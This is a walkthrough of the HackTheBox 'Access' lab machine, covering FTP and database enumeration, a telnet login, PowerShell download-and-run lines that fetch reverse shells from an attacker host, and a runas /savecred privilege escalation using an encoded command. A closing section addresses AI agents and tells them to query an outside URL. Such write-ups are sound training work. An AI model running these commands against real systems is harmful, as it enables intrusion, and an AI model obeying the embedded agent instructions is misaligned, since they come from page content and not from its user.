# HackTheBox - Access

![](/files/-MY3iU2D7bhkud_zX8Eu)

### Nmap scan results (Basic and all port)

![](/files/-MY3ik6G6N40rw41qaF4)

```
nmap -sC -sV -oA nmap-access 10.10.10.98
```

![](/files/-MY3jcRaHU82aA2JfpVl)

### FTP Enumeration

FTP Anonymous access allowed, so we can get all the files present in that share.

![](/files/-MY3koKJbXxz6eTMWadH)

We have `AccessControl.zip` and `backup.mdb` file from the FTP Server.

>  A file with the **MDB** file extension is a Microsoft Access Database file that literally stands for Microsoft Database. ... **MDB** files contain database queries, tables, and more that can be used to link to and store data from other files, like XML and HTML, and applications, like Excel and SharePoint.

### Exploring mdbtools

```
apt-get install mdbtools
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Downloading all the files
```

This command will download all the necessary tools required for analyzing the backup.mdb file.

We can list all the tables using mdb-tables or mdb-sql command.

Using mdb-tables:

![](/files/-MY3pyXltmMTaoI9BfLf)

Using mdb-sql:

![](/files/-MY3q743ICITBbF0l0se)

To extract the information from the tables, we can use mdb-json.

```
for i in $(mdb-tables backup.mdb);do mdb-json backup.mdb $i;done
```

![](/files/-MY3qLocpDh0oI287_pK)

 The password for zip file is stored inside this backup.mdb file and we can search for it.

![](/files/-MY3qkkJaP0K0q9qEu05)

![](/files/-MY3rXhrfL1O8m25LYiE)

### Analyzing .pst file using readpst 

We can convert .pst file into .mbox which can be human readable using `readpst` command.

![](/files/-MY3y2EJ9J25MEerioGm)

![](/files/-MY3yVUwN38pX28U7xyt)

### Using Telnet to get shell access

Password for the security account is changed to `4Cc3ssC0ntr0ller`

We can use telnet to get a shell access as security user.

![](/files/-MY3z8XSGx8rfv8CZtsL)

This shell is not really stable and we need to get stable shell for further enumeration. So we will be using nishang Shells from [github](https://github.com/samratashok/nishang/tree/master/Shells).

![](/files/-MY3zopyAAIXs1jKZSLB)

```
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell.ps1')"
```

Make sure to add this line at the end of script to run as soon as it gets downloaded on the target computer.

![](/files/-MY4-knmwY190aEB4y_H)

![](/files/-MY4-oxSR37QGglkLKaQ)

### Running JAWS script for system enumeration

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/jaws-enum.ps1')
```

![](/files/-MY43Xtl-JpMaL7U65m-)

![Keep this in mind: cmdkey /list ](/files/-MY43xx0UEkRqmKrc5EV)

We find a very interesting file present under `C:\Users\Public\Desktop`

![](/files/-MY44cEOdDHGeMKBm7Rg)

### Privilege Escalation

We can view the raw contents of the file using `get-Content` command in powershell or we can view it the other way.

```
$WScript = New-Object -ComObject Wscript.Shell
$shortcut = Get-ChildItem *.lnk
$WScript.CreateShortcut($shortcut)
```

![](/files/-MY45ELs49VbxlAEANgp)

We can run this command as Administrator, so we will try to get a reverse shell using this.

![](/files/-MY47dNxhrqiUHcgQZWt)

We changed the port to 9002 since we already have a connection to port 9001. So now we need to use base64 encoded string to run certain windows commands.

```
echo "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell2.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
```

Windows uses UTF-16 Little Endian and we can convert it using iconv. Also after that we can use base64. w flag specifies `wrap encoded lines after COLS character`

```
runas /user:ACCESS\Administrator /savecred "Powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOgA4ADAAMAAwAC8AcwBoAGUAbABsADIALgBwAHMAMQAnACkACgA="
```

![](/files/-MY49WxW9jf6jAgF-vge)

{% hint style="info" %}
Note: If we want to access or read all the recently cracked hashes, then we can use the following command. `cat ~/.john/john.pot`
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://akshaydeepakshinde.gitbook.io/hackthebox-windows/hackthebox-access.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.